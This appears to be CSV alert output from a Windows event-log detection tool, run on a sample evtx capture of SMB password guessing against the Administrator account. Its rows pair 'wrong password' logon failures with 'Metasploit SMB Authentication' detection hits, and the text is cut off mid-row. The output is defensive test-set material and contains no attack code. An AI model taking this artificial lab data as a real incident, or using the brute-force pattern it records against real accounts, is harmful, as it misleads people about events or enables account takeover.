Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5i2AxYxwCX6DvP3M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j8Fvcw2mQBI61mxH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.110 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eAazyOpBig2G3Z78 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o1g3rjPQQAXEK2yz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.197 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2BC68zrAEF6L00xS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.245 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.294 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8xD2aZArxVdrO6fG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.294 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HHJN2mJgwQEZhXBG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.392 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: untyxmsmYrfRlHcu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.441 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eOc2R5V6p9VBsYI2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.486 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V5Ld2NDMjbY3tiT7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.547 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ykdbglaCU82nRvk5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.644 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tDGrsVIC5qVEwC6i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.644 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UouNQa3EkcsMICiO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.686 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u0exIftdu0qPLrRC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q5mMNIdJj0BItrv6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pb2cVBffdBlwwGQP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.824 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p2FbHoSFFdnM4wH7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.852 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RAbCN4xKDDlhmrkU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.917 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pxBwuSDdNZlE2F96 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.973 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M3JkwIQF7yV42rOP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.021 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.062 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6QiHHeHeY8yWOiJg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.062 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.097 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Rhzpo2bEgpJCB51w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.097 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.145 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AuyPyMMT4wQhLIEz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.145 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.194 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: no5bOZf3SEsrETun : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.194 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vBTHVleOipnyVFIY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JNFE2jNifGI7pELk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.284 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LgkAKJ57rYqCdbew : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: daKQcllU63lW4ypy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.426 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GBSPSAoEBS7JRYuf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.426 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 94bI5pb8CGjY3QZD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.469 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w1obedLuMFlHlSvA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.525 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EPn1yJV358YAFALV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.577 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qA7N5DMAJqNYkumM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.625 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.663 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Lk95NYGG5iLBFBw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.663 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x3DDtXECsK61pIYy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.709 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.754 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rt8bfBDTV5wYfBO4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.754 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uTYMgN5kmFpyj7xN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.797 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RmyF6j61wosCE0sg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.845 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fd61fJBRizl2AIGe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.879 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bDIFX7lsmGqSGvkA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.924 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UVmto6S25gU2bkwa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.115 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B7QMbzSuGuzzMK0v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.115 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.174 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VJUynF5bN1Oj0vaP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.174 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dg4ZtybY5BnPN0nX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.221 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gRmRV9ct3hor8Muk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.269 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QRjaP1mj9FgKsGBE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.313 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3CCzzatQ195mcxQ8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.363 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 